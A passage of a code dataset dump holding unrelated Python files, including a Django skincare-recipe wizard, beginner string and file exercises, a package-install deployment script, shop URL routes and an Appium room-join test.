'id': o['option__id'], \n 'helper': o['option__helper']\n } for o in Questionnaire.objects.filter(question=q).\\\n values('option__name','option__id',\n 'option__helper')]\n })\n return render(request, \"wizard.html\", \n { 'questions': data, \n 'cart_size': cart_size(request),\n 'valid_user': get_valid_user_data(request) })\n\ndef wizard_submit(request):\n json_response = { 'success': False }\n if request.method == 'POST':\n init_user_login(request)\n data = json.loads(request.POST['data'])\n user = request.user\n skinType = None\n skinConcerns = None\n wz = QuestionnaireUserData() \n wz.user = user\n wz.save()\n for d in data:\n for o in d['options']:\n qe = QuestionnaireEntry()\n qe.question = Question.objects.get(pk=d['id'])\n qe.option = Option.objects.get(pk=o)\n qe.wizard = wz\n qe.save()\n if d['id'] == '7':\n skinType = SkinType.objects.get(pk=d['options'][0]);\n if d['id'] == '8':\n skinConcerns = SkinConcern.objects.filter(id__in=d['options'])\n recipes = Recipe.objects.filter(skin_type=skinType, skin_concern__in=skinConcerns)\n recipes_ing = [r.mandatory_ingredient for r in recipes]\n skin_type_ingredients = Ingredient.objects.filter(id__in=SkinTypeIngredient.objects.filter(skin_type=skinType).values('ingredient'))\n o_ids = []\n for r in recipes:\n ri = random.choice(SkinTypeConcernIngredient.objects\\\n .filter(skin_type=r.skin_type, skin_concern=r.skin_concern)\\\n .filter(~Q(ingredient=r.mandatory_ingredient), ~Q(ingredient_id__in=o_ids))).ingredient\n o_ids.append(ri)\n base = random.choice(Base.objects.filter(skin_type=skinType))\n \"\"\"\n Base conditions:\n 1. French green clay cannot be used for people with skin concern \"Sensitive\n and irritated by harsh ingredients\"\n 2. For skin combination oily and skin concern \" sensitive and irritated by\n harsh ingredients\" : always use white kaolin clay\n 3. For skin combination dry and skin concern \" sensitive and irritated by \n harsh ingredients\" : always use white goat milk powder\n \"\"\"\n if SkinConcern.objects.get(name__contains=\"Sensitive\") in skinConcerns:\n if skinType.name == 'Oily':\n base = Base.objects.get(name__contains='White Kaolin Clay')\n elif skinType.name == 'Dry':\n base = Base.objects.get(name__contains='Goat Milk')\n else:\n base = random.choice(Base.objects.filter(skin_type=skinType)\\\n .filter(~Q(pk=Base.objects.get(name__contains='French').id)))\n mixing_agent = random.choice(MixingAgent.objects.filter(skin_type=skinType))\n json_response = {\n 'base'\t : str(base.id),\n 'mixing_agent' : str(mixing_agent.id),\n 'recipes' : [str(r.id) for r in recipes],\n 'optional' : [str(o.id) for o in o_ids],\n 'qd' : str(wz.id),\n } \n return HttpResponse(json.dumps(json_response, ensure_ascii=False))\n\ndef results(request):\n if request and request.method == 'GET':\n init_user_login(request)\n user = request.user\n recipe_ids = [int(x) for x in request.GET.getlist('recipes[]')]\n o_ids = [int(x) for x in request.GET.getlist('optional[]')]\n recipes = Recipe.objects.filter(id__in=recipe_ids)\n secondary_ings = Ingredient.objects.filter(id__in=o_ids)\n qd_id = request.GET.get('qd')\n skin_type = request.GET.get('skin_type', None)\n base = Base.objects.get(pk=request.GET.get('base'))\n mixing_agent = MixingAgent.objects.get(pk=request.GET.get('mixing_agent'))\n #secondary_ings = [random.choice(SkinTypeConcernIngredient.objects\\\n #.filter(skin_type=r.skin_type, skin_concern=r.skin_concern)\\\n #.filter(~Q(ingredient=r.mandatory_ingredient))).ingredient\\\n #for r in recipes]\n essential_oils = Ingredient.objects.get(name__contains=\"Essential Oils\")\n r1 = recipes[0]\n r2 = recipes[1]\n r3 = recipes[2]\n o1 = secondary_ings[0]\n o2 = secondary_ings[1]\n o3 = secondary_ings[2]\n o_ids = [i.id for i in secondary_ings]\n\n data = {\n 'first': {\n 'type': 'primary',\n 'base': {\n 'id': base.id,\n 'name': base.name,\n 'image': base.image,\n 'helper': base.helper,\n 'description': base.description, \n },\n 'mixing_agent': {\n 'id': mixing_agent.id,\n 'name': mixing_agent.name,\n 'image': mixing_agent.image,\n 'helper': mixing_agent.helper,\n 'description': mixing_agent.description, \n },\n 'essential_oils': {\n 'id': essential_oils.id,\n 'name': essential_oils.name,\n 'image': essential_oils.image,\n 'helper': essential_oils.helper,\n 'description': essential_oils.description,\n },\n 'recipes': [{\n 'id': r.id,\n 'i_id': r.mandatory_ingredient.id,\n 'i_name': r.mandatory_ingredient.name,\n 'i_image': r.mandatory_ingredient.image,\n 'i_helper': r.mandatory_ingredient.helper,\n 'i_description': r.mandatory_ingredient.description,\n } for r in recipes],\n 'b_id': base.id,\n 'm_id': mixing_agent.id,\n 'r1_id': r1.id,\n 'r2_id': r2.id,\n 'r3_id': r3.id,\n 'o_ids': [],\n 'qd_id': qd_id,\n },\n 'second': {\n 'type': 'secondary',\n 'base': {\n 'id': base.id,\n 'name': base.name,\n 'image': base.image,\n 'helper': base.helper,\n 'description': base.description, \n },\n 'mixing_agent': {\n 'id': mixing_agent.id,\n 'name': mixing_agent.name,\n 'image': mixing_agent.image,\n 'helper': mixing_agent.helper,\n 'description': mixing_agent.description, \n },\n 'essential_oils': {\n 'id': essential_oils.id,\n 'name': essential_oils.name,\n 'image': essential_oils.image,\n 'helper': essential_oils.helper,\n 'description': essential_oils.description,\n },\n #'recipes': [{\n #'id': r.id,\n #'i_id': r.mandatory_ingredient.id,\n #'i_name': r.mandatory_ingredient.name,\n #'i_image': r.mandatory_ingredient.image,\n #'i_helper': r.mandatory_ingredient.helper,\n #'i_description': r.mandatory_ingredient.description,\n #} for r in recipes],\n 'recipes': [{\n 'id': i.id,\n 'i_id': i.id,\n 'i_name': i.name,\n 'i_image': i.image,\n 'i_helper': i.helper,\n 'i_description': i.description,\n } for i in secondary_ings],\n 'b_id': base.id,\n 'm_id': mixing_agent.id,\n 'r1_id': r1.id,\n 'r2_id': r2.id,\n 'r3_id': r3.id,\n 'o1_id': o1.id,\n 'o2_id': o2.id,\n 'o3_id': o3.id,\n 'o_ids': o_ids,\n 'qd_id': qd_id,\n },\n 'qd_id': qd_id,\n 'skin_type': skin_type,\n }\n data['cart_size'] = cart_size(request)\n data['valid_user'] = get_valid_user_data(request)\n return render(request, \"results.html\", data)\n","repo_name":"dev1farms2face/f2f","sub_path":"farms2face/facepackwizard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"36874617680","text":"# Files\nfname = input(\"Enter file name: \")\nfh = open(fname)\ncount = 0\nsun = 0\nfor line in fh:\n if line.startswith(\"X-DSPAM-Confidence:\"):\n ipos = line.find(\":\")\n piece = line[ipos+1:]\n value = float(piece)\n count = count + 1\n sun = sun + value\nprint('Average spam confidence:', sun/count)","repo_name":"revacprogramming/python01-Tejadithya","sub_path":"ActivitySet01/problem08.py","file_name":"problem08.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5437539935","text":"import time\nimport sys\n\nstart_time = time.time()\n\nfor line in sys.stdin:\n # solution found, print time\n if \"--\" in line:\n p = (time.time()-start_time)\n print(p)\n sys.stdout.write(line)\n sys.stdout.flush()","repo_name":"slipstreaming2/dissertation","sub_path":"bash/timingObjective.py","file_name":"timingObjective.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"1605912163","text":"import urllib.request\nimport urllib.parse\n\n#1、确定爬取网页的url地址\nurl ='http://www.baidu.com/s'\nheader = {\n \"User-Agent\" : \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\",\n \"Connection\" : \"keep-alive\"\n}\n\n\nwd = {'wd':'吴京'}\nurlwd = urllib.parse.urlencode(wd)\nurl = url+'?'+urlwd\n#2、根据url获取网页信息\nurlRequest = urllib.request.Request(url, headers=header)\n\n\nresponse = urllib.request.urlopen(urlRequest)\n\n# print(type(urlRequest))\n# print(type(response))\n# print(response.getcode())\n# print(response.getheader(name=\"User-Agent\"))\n# print(urlRequest.get_header('Connection'))\n# print(urlRequest.get_header(\"User-Agent\"))\n\nprint(response.geturl())\nprint(response.read().decode('utf-8'))","repo_name":"typeme/python_spider_study","sub_path":"Day05/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"33086828747","text":"def say_hello(name):\n return \"Hi my name is {}\".format(name)\n # takes in a name and returns the string \"Hi my name is \" plus the name\n # use whichever form of interpolation is most appropriate\n\ndef replace_given_substring(str_to_replace, str_to_insert, string):\n return string.replace(str_to_replace, str_to_insert)\n # this function takes three parameters --\n # the first is the substring we would like to replace.\n # the second substring is what we would like to use inplace of the first\n # the third is the actual string which we want to operate on\n # the function should return the new string\n\ndef remove_duplicate_punctuation(string_var):\n import string\n new_string = ''\n punctuation = string.punctuation\n for x in range(1,(len(string_var))):\n if string_var[x-1] not in punctuation:\n new_string = new_string + string_var[x-1]\n elif string_var[x-1] != string_var[x]:\n new_string = new_string + string_var[x-1]\n return new_string + string_var[-1]\n # should remove all duplicate punctuation marks in a given string\n # i.e. \"Hi!!!!!!\" should be reformatted to \"Hi!\"\n # i.e. \"Hello..... My name is Terrance!! How are you???\" -> \"Hello. My name is Terrance! How are you?\"\n\n\ndef validate_email_format(email):\n import string\n if email.count('@') == 1 and email.count('.com') == 1:\n special_char = string.punctuation\n person_part = (email.split('@'))[0]\n correct_email = ''\n for char in person_part:\n if char not in special_char:\n correct_email = correct_email + char\n if correct_email == person_part:\n return True\n else:\n return False\n else:\n return False\n\n # should make sure there are no special characters (i.e. *,~,#,$,%,&,(,),`,\",',:,;,/,>,<)\n # make sure the email contains an @ symbol and a .com\n # return True if format passes tests, return False otherwise\n\n\ndef anonymize_credit_card_number(credit_card_number):\n credit_card = credit_card_number[:-4]\n ccn = ''\n for char in credit_card:\n try:\n if type(int(char)) == int:\n ccn = ccn + 'X'\n except:\n ccn = ccn + char\n return ccn + credit_card_number[-4:]\n # should replace all characters except the last 4 with 'X'\n # return the anonymized credit card number as a string\n # the credit card may have characters that are not numbers (i.e. spaces and dashes, which we would want to keep)\n # i.e. 1234-5678-90-1234 -> XXXX-XXXX-XX-1234\n","repo_name":"ptbailey/python-strings-indepth-lab","sub_path":"string_functions.py","file_name":"string_functions.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"39"} +{"seq_id":"20247404948","text":"from random import randrange\nA =[1,2,3,4,5]\n\ndef shuffle(A):\n #i from 0 - n-1 \n for i in range(len(A)-1):\n #j from i to n\n j =randrange(i,len(A))\n A[i],A[j]=A[j],A[i]\n#[4, 5, 1, 2, 3]\n","repo_name":"Boom-Ba/Math","sub_path":"Probability/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16983654292","text":"class Solution:\n def findWinners(self, matches: List[List[int]]) -> List[List[int]]:\n wins = defaultdict(int)\n losses = defaultdict(int)\n \n undefeated = []\n oneloss = []\n for m in matches:\n wins[m[0]] += 1\n losses[m[1]] += 1\n \n minplayer = min(min(wins.keys()), min(losses.keys()))\n maxplayer = max(max(wins.keys()), max(losses.keys()))\n \n for n in range(minplayer, maxplayer+1):\n if losses[n] == 0 and wins[n] > 0:\n undefeated.append(n)\n elif losses[n] == 1:\n oneloss.append(n)\n \n return [undefeated, oneloss]","repo_name":"dyhliang/Leetcode","sub_path":"2225-find-players-with-zero-or-one-losses/2225-find-players-with-zero-or-one-losses.py","file_name":"2225-find-players-with-zero-or-one-losses.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"42831323523","text":"__author__ = \"Riccardo Cagnasso \"\n\nimport collections as coll\n\n\nclass PickOne(object):\n \"\"\"\n PickOne is a class that you use for asking the user to choose between\n some options\n\n Arguments:\n choiches --- the available options between the user can choose. It can\n be an array or a dictionary. In the first case the keys are int from 0\n to len-1.\n\n Keyword arguments:\n message (optional) --- the message to be displayed when asking for\n input. It's a template for \"format\" function and receives the\n \"{choices}\" and the {default} parameter.\n errormessage (optional) --- the message to be displayed when the user\n entered a incorrect answer\n default (optional) --- a default value to use if user provides no input\n \"\"\"\n def __init__(self, choices,\n message=\"Choose one from [{choices}]{default}{cancelmessage}: \",\n errormessage=\"Invalid input\", default=None, cancel=False, cancelkey='c',\n cancelmessage='(press {cancelkey} to cancel)'):\n self.message = message\n self.errormessage = errormessage\n\n self.cancel = cancel\n self.cancelkey = cancelkey\n self.cancelmessage = cancelmessage\n\n if type(choices) == list:\n self.choices = coll.OrderedDict(\n zip(map(str, range(0, len(choices))), choices))\n elif issubclass(choices.__class__, dict):\n self.choices = coll.OrderedDict([(str(k), v)\n for k, v in choices.items()])\n\n self.default = default\n\n def buildPrompt(self):\n choices = [\"{key}={choice}\".format(key=key, choice=choice)\n for key, choice in self.choices.items()]\n\n if self.default is not None:\n default = \" (default={default})\".format(default=self.default)\n else:\n default = \"\"\n\n if self.cancel:\n cancelmessage = self.cancelmessage.format(cancelkey=self.cancelkey)\n else:\n cancelmessage = ''\n\n return self.message.format(choices=\" \".join(choices), default=default,\n cancelmessage=cancelmessage)\n\n def ask(self):\n \"\"\"\n The ask method is used to get the input from users\n \"\"\"\n while True:\n i = input(self.buildPrompt())\n\n if self.cancel and i == self.cancelkey:\n return None\n\n if i == \"\" and self.default is not None:\n i = self.default\n\n if i in self.choices:\n return self.choices[i]\n else:\n for k, v in self.choices.items():\n if i == str(v):\n return self.choices[k]\n\n print(self.errormessage)\n\n\ndef ask(choices,\n message=\"Choose one from [{choices}]{default}{cancelmessage}: \",\n errormessage=\"Invalid input\", default=None,\n cancel=False, cancelkey='c',\n cancelmessage='press {cancelkey} to cancel'):\n \"\"\"\n ask is a shorcut instantiate PickOne and use .ask method\n \"\"\"\n\n return PickOne(choices, message, errormessage, default, cancel, cancelkey,\n cancelmessage).ask()\n","repo_name":"riccardocagnasso/pickone","sub_path":"pickone/pickone.py","file_name":"pickone.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"11408728909","text":"\"\"\"Split and merge color channels\"\"\"\nimport cv2\nimage=cv2.imread(\"image2.png\")\nb,g,r=cv2.split(image)\n\ncv2.imshow(\"Red\",r)\ncv2.imshow(\"Green\",g)\ncv2.imshow(\"Blue\",b)\n\nmerged=cv2.merge((r,g,b))\ncv2.imshow(\"Merged\",merged)\n\nif cv2.waitKey(0)==27:\n\tcv2.destroyAllWindows()\n","repo_name":"glen-s-abraham/sem3record","sub_path":"DIP/splitColorChannel.py","file_name":"splitColorChannel.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40083050049","text":"# coding=utf-8\nimport sys\nfrom os import path\nfrom simplejson import load\nfrom subprocess import call\nfrom cloud import login\nfrom cloud import add_server\nfrom requests import Session\nfrom utility import exit_with_msg\nfrom utility import print_info\nfrom utility import print_error\nfrom utility import parseArg\n\n\ndef assert_ext(ext_file):\n if (path.isfile(ext_file) == False):\n exit_with_msg('file ext.json does not exist.')\n\n\ndef create_and_exec_install_shell(ext_object):\n try:\n cmd = '#!/bin/bash\\nsudo apt-get update\\n'\n for package_name in ext_object['install_packages']:\n cmd += 'sudo apt-get install -y %s\\n' % package_name\n install_shell = open('./install.sh', 'w+')\n cmd += '\\n'\n install_shell.write(cmd)\n install_shell.close()\n ret = call('sudo chmod a+x install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('chmod for install')\n ret = call('./install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('exec install.sh')\n ret = call('sudo rm -f install.sh', shell=True)\n if (ret != 0):\n exit_with_msg('rm install.sh')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user - when install shell')\n sys.exit(1)\n except IOError:\n print_error('IO Error - when install shell')\n sys.exit(1)\n\n\ndef dowload_compile_and_install_libiconv():\n try:\n cmd = \"axel https://ftp.gnu.org/pub/gnu/libiconv/libiconv-1.15.tar.gz\\n \\\n tar -xvf libiconv-1.15.tar.gz\\n \\\n cd libiconv-1.15\\n \\\n sudo ./configure --prefix=/usr/local\\n \\\n sudo make\\n \\\n sudo make install\\n \\\n cd -\\n \\\n sudo rm libiconv* -rf\\n \\\n sudo ldconfig\"\n ret = call(cmd, shell=True)\n if (ret != 0):\n exit_with_msg('install libiconv')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user')\n sys.exit(1)\n\n\ndef ln_hiredis():\n cmd = 'sudo ln -s /usr/lib/x86_64-linux-gnu/libhiredis.so.0.10 /usr/lib/x86_64-linux-gnu/libhiredis.so.0.13'\n ret = call(cmd, shell=True)\n return ret\n\n\ndef link_hiredis(ext_dir):\n try:\n if (path.isfile('/usr/lib/x86_64-linux-gnu/libhiredis.so.0.13')):\n return\n if (path.isfile('/usr/lib/x86_64-linux-gnu/libhiredis.so.0.10')):\n ret = ln_hiredis()\n if (ret != 0):\n exit_with_msg('Link hiredis')\n else:\n cmd = 'sudo cp %slibhiredis.so.0.10 /usr/lib/x86_64-linux-gnu' % ext_dir\n ret = call(cmd, shell=True)\n if (ret != 0):\n exit_with_msg('cp libhiredis.so')\n else:\n ret = ln_hiredis()\n if (ret != 0):\n exit_with_msg('Link hiredis')\n except KeyboardInterrupt:\n print_info('Keyboard interrupt by user')\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n isCalc = False\n isCalc = parseArg(sys.argv[1:])\n ext_dir = '../ext/'\n assert_ext(ext_dir + 'ext.json')\n ext_object = load(open(ext_dir + 'ext.json', 'r'))\n create_and_exec_install_shell(ext_object)\n session = Session()\n ret = login(session, ext_object['cloud_login_url'], ext_object['cloud_username'],\n ext_object['cloud_password'], debug=ext_object['debug_mode'])\n if (ret):\n print_info('Login success')\n ret = add_server(\n session, ext_object['cloud_add_server_url'], ext_dir, debug=ext_object['debug_mode'])\n if (ret):\n print_info('Add server success')\n else:\n exit_with_msg('Add server fail')\n else:\n exit_with_msg('Login fail')\n if (isCalc == False):\n link_hiredis(ext_dir)\n dowload_compile_and_install_libiconv()\n","repo_name":"niconical/Script","sub_path":"auto_deploy/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72094806119","text":"import discord\nfrom discord.ext import commands\n\nclass Avatar(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def avatar(self, ctx, member: discord.Member = None):\n if member is None:\n member = ctx.author\n\n embed = discord.Embed(title=f\"Avatar - {member.name}\", color=discord.Color.blue())\n embed.set_image(url=member.avatar_url)\n\n await ctx.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(Avatar(bot))\n","repo_name":"xxsweatygirlyt/orko-bot","sub_path":"avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74513080359","text":"'''\nConverts a string to a binary file.\nUsage: python b.py \nExample: python b.py \"Hello World\" hello.bin\n'''\n\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Usage: python b.py \")\n sys.exit(1)\n\ninput_string = sys.argv[1]\nfile_name = sys.argv[2]\n\nwith open(file_name, \"wb\") as binary_file:\n binary_file.write(input_string.encode())","repo_name":"dimitrivlachos/Inky-pHAT-Zero","sub_path":"b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5441628247","text":"# -*- coding: utf-8 -*-\n# @Time : 18-9-12 下午1:47\n# @Author : Gold_py\n# @Site : \n# @File : urls.py\n# @Software: PyCharm\nfrom django.conf.urls import url\nfrom .views import IndexViews,User\n\n\nurlpatterns = [\n # 跳转到商城的首页面\n url(r'^$', IndexViews.homeindex,name='home_index' ),\n # 商城的列表页面\n url(r'^list/(?P[0-9]+)/$',User.UserList,name='user_list'),\n # 商城商品的详情页面\n url(r'^info/(?P[0-9]+)/$',User.UserInfo,name='user_info'),\n # 商城的注册界面\n url(r'^register/$',User.UserRegiser,name='user_regiser'),\n # 商城的登录界面\n url(r'^login/$',User.UserLogin,name='user_login'),\n # 验证码的生成位置\n url(r'^passcode/$',User.verifycode,name='user_pass_code'),\n # 获取手机验证码\n url(r'^phonecode/$',User.phonecode,name='user_phone_code'),\n # 退出都登录\n url(r'^logout/$',User.UserLogOut,name='user_log_out'),\n # 购物车\n url(r'^bycar/$',User.UserCar,name='user_car'),\n # 加入购物车\n url(r'^bycar/addgood/$',User.AddGood,name='add_good'),\n # 跟改购物车\n url(r'^bycar/edit_good/$',User.GoodEdit,name='good_edit'),\n # 删除购物车中的某个商品\n url(r'^bycar/del_good/$',User.GoodDel,name='good_del'),\n # 清除购物车\n url(r'^bycar/flush/$',User.GoodFlushi,name='good_flush'),\n\n\n\n # 以下的操作需要获取登录认证\n\n\n\n # 商城跳转到确认订单的页面\n url(r'^order/confirm/$',User.OrderMake,name='order_make'),\n # 生成订单\n url(r'^order/create/$',User.OrderCreate,name='order_create'),\n # 跳转到付款的界面\n url(r'^order/payfor/$',User.OrderPayFor,name='order_pay_for'),\n # 订单状态改变为1,已付款\n url(r'^order/payfored/$',User.OrderPayFored,name='order_pay_fored'),\n # 跳转到付款成功界面\n url(r'^order/payforsuccess/$',User.OrderPayForSuccess,name='order_pay_for_suscess'),\n # 跳转到我的订单界面\n url(r'^my/order/orderlist/$',User.MyOrderList,name='my_order_list'),\n\n\n # 添加地址\n url(r'^user/addaddress/$',User.AddAdderss,name='add_address'),\n # 地址管理器\n url(r'address/manage/$',User.AdderssManage,name='address_manage'),\n # 删除地址\n url(r'address/manage/delete/$',User.AdderssManageDelete,name='address_manage_delete'),\n # 跟改地址\n url(r'address/manage/update/$',User.AdderssManageUpdate,name='address_manage_update'),\n\n\n # 个人中心\n url('^user/mycenter/$',User.MyCenter,name='my_center'),\n # 更改个人信息\n url('^user/mycenter/$',User.MyCenter,name='my_center'),\n\n\n # 初始化密码\n url('^init/$',User.Init,name='init'),\n\n\n\n\n # 缓存测试\n url('^cache1/$',User.cache1,name='cache1'),\n url('^cache2/$',User.cache2,name='cache2'),\n\n\n\n\n\n]","repo_name":"GITliyanfeng/phone-shop-django","sub_path":"myhome/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"20637984313","text":"# -*- coding:utf-8 -*-\nimport sys,re,subprocess\nsys.path.append('..')\n\nfrom time import sleep\nimport unittest\nimport lib.public_functions as pubfuc\nimport multiprocessing\nfrom appium import webdriver\nfrom appium.webdriver.common.touch_action import TouchAction\n\n\ndef 加入离开房间(driver,roomid):\n print(driver.desired_capabilities)\n devicedriverinfo = driver.desired_capabilities\n sleep(5)\n num = 1\n print(driver.page_source)\n while num < 301:\n if num == 1:\n driver.find_element_by_xpath('//android.widget.EditText[@text=\"会议室名称\"]').send_keys(roomid)\n sleep(2)\n print(f\"第{num}次{driver}加入离开房间\")\n # io.agora.vcall:id/encryption_key\n # pubfuc.waittimeout(driver.find_element_by_id(控件信息['JOIN']['id']))\n if not driver.find_element_by_xpath('//android.widget.Button[@text=\"加入\"]').get_attribute('enabled'):\n sleep(3)\n driver.find_element_by_xpath('//android.widget.Button[@text=\"加入\"]').click()\n sleep(10)\n if driver.find_element_by_xpath(\"//android.widget.ImageView[@content-desc='END_CALL']\") is None:\n driver.tap([100,100])\n sleep(2)\n driver.find_element_by_xpath(\"//android.widget.ImageView[@content-desc='END_CALL']\").click()\n sleep(2)\n num += 1\n\n\nclass AgoraTest(unittest.TestCase):\n\n def setUp(self):\n # self.控件信息 = pubfuc.getymlfileinfo()['zego_Android']\n #第一个为主播\n devicelist = ['RedMI']\n\n\n self.sd = pubfuc.StartDriver(devicelist)\n\n self.proc_list = []\n 是否mac = 'mac' in pubfuc.getcurretsystem()\n\n pubfuc.cleannodeproc()\n for i in range(len(self.sd.devicelist)):\n self.proc_list.append(multiprocessing.Process(target=self.sd.startappiumserver, args=(i,)))\n\n # print(self.proc_list)\n\n for pro in self.proc_list:\n pro.start()\n\n for pro in self.proc_list:\n pro.join()\n\n while len(self.sd.getnodeprocpid()) < len(devicelist):\n sleep(1)\n\n\n print(self.sd.getnodeprocpid())\n\n self.driverlist = []\n for i in range(len(self.sd.devicelist)):\n desire_caps = self.sd.realdevice[i]\n desire_caps['appPackage'] = 'io.agora.vcall'\n desire_caps['appActivity'] = 'io.agora.vcall.ui.SplashActivity'\n driver = webdriver.Remote(f\"http://localhost:{self.sd.aport[i]}/wd/hub\", desire_caps)\n self.driverlist.append(driver)\n driver.page_source\n print(self.driverlist)\n\n def test_001参与者多次加入离开房间(self):\n procs = []\n pool = multiprocessing.Pool(processes=len(self.driverlist))\n for driver in self.driverlist:\n proc = pool.apply_async(加入离开房间,(driver,'qq',))\n procs.append(proc)\n for i in procs:\n i.get()\n for i in procs:\n i.wait()\n\n def tearDown(self):\n # quite the device driver\n for driver in self.driverlist:\n driver.quit()\n for proc in self.proc_list:\n print(proc.is_alive())\n proc.terminate()\n # proc.kill()\n #clean the node process,appium server is started by node\n pubfuc.cleannodeproc()\n\n\n\n\n\n","repo_name":"zhhy/auto","sub_path":"testcase/agora_testcase.py","file_name":"agora_testcase.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12653924532","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nsys.path.append(os.path.abspath(os.path.dirname(__file__)+'/../../'))\nsys.path.append(os.path.abspath('/grad/1/iida/mytools/python2.7/lib/python2.7/site-packages/'))\n\nimport argparse\nimport math\nimport cv2\nimport numpy as np\nimport csv\nimport glob\nimport yaml\nimport pickle\nfrom multiprocessing import Pool\n\nIN_RECONSTRUCTION_FILENAME = \"tangoCameraPose_floor.json\"\nTRAJECTORY_FILENAME = \"2dtrajectory.csv\"\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='create score map')\n parser.add_argument('test_num_dir', help='path to data dir to be processed')\n parser.add_argument('-p', '--parameter', nargs='?', type=str, default='parameter.yaml', help='load parameter yaml file(default=parameter.yaml)')\n parser.add_argument('-d', '--data', nargs='?', type=str, default='data.yaml', help='load data yaml file(default=data.yaml)')\n parser.add_argument('-f', '--target_floors', nargs='*', type=str, help='target floor names')\n parser.add_argument('-t', '--targets', nargs='*', type=str, help='target data names')\n parser.add_argument('-c', '--config', nargs='?', type=str, help='load config yaml file')\n parser.add_argument('-a', '--plot_all', default=False, action='store_true', help='create for all floor(default=False)')\n parser.add_argument('-o', '--target_data_config', nargs='?', type=str, default=None, help='target data config(default: same as data)')\n parser.add_argument('-j', '--process_num', nargs='?', type=int, default='4', help='process number(default=4)')\n args = parser.parse_args()\n\n # set args\n test_num_dir = args.test_num_dir\n target_floors = args.target_floors\n targets = args.targets\n plot_all = args.plot_all\n process_num = args.process_num\n parameter_fn = os.path.join(test_num_dir, args.parameter)\n data_dir = os.path.join(test_num_dir, os.path.splitext(args.data)[0])\n data_config_fn = os.path.join(test_num_dir, args.data)\n target_data_config_fn = data_config_fn if args.target_data_config is None else os.path.join(test_num_dir, args.target_data_config)\n results_dir = os.path.join(data_dir, 'score')\n\n # logger setting\n log_fn = os.path.join(os.path.join(data_dir), 'log.txt')\n import logging\n logger = logging.getLogger('testLogger')\n logger.setLevel(logging.INFO)\n formatter = logging.Formatter('(PID:%(process)d)[%(asctime)s][%(levelname)s] %(message)s')\n fh = logging.FileHandler(log_fn)\n logger.addHandler(fh)\n fh.setFormatter(formatter)\n sh = logging.StreamHandler()\n logger.addHandler(sh)\n sh.setFormatter(formatter)\n logger.info('Start Logging: {}'.format(log_fn))\n # logger setting done\n\n # set parameters\n logger.info('load meta yaml file: {}'.format(parameter_fn))\n with open(parameter_fn, 'r') as f:\n parameter = yaml.load(f)\n crop_size = parameter['setting']['crop_size']\n crop_step = parameter['setting']['crop_step']\n\n pix_per_meter = parameter['setting']['pix_per_meter']\n crop_size = parameter['setting']['crop_size']\n crop_step = parameter['setting']['crop_step']\n align_step = parameter['setting']['align_step']\n align_voxel_size = parameter['setting']['align_voxel_size']\n decimate = parameter['setting']['align_decimate']\n\n fire_threshold = parameter['setting']['fire_threshold']\n good_consistency_threshold = parameter['setting']['good_consistency_threshold']\n\n hit_shot_count_threshold = parameter['setting']['hit_shot_count_threshold']\n floor_voxel_count_threshold = parameter['setting']['floor_voxel_count_threshold']\n\n max_save_num = parameter['setting']['max_save_num']\n max_save_znum = parameter['setting']['max_save_znum']\n\n # load datasets\n logger.info('load target data yaml file: {}'.format(target_data_config_fn))\n with open(target_data_config_fn, 'r') as f:\n data_config = yaml.load(f)\n floorplans_dir = data_config['path']['floorplans']\n datasets_dir = data_config['path']['datasets']\n\n # load target pairs\n target_pairs = {}\n if target_floors is None:\n target_floors = []\n for floor in data_config['floors']:\n if data_config['floors'][floor]['val']:\n target_floors.append(floor)\n if targets is None:\n targets = []\n for dn in data_config['datasets']:\n # if 'target_floor_all' in config['datasets'][dn] and config['datasets'][dn]['target_floor_all']:\n # target_pairs[dn] = target_floors\n # elif 'target_floor' in config['datasets'][dn]:\n # floors = []\n # if config['datasets'][dn]['target_floor'] is None:\n # 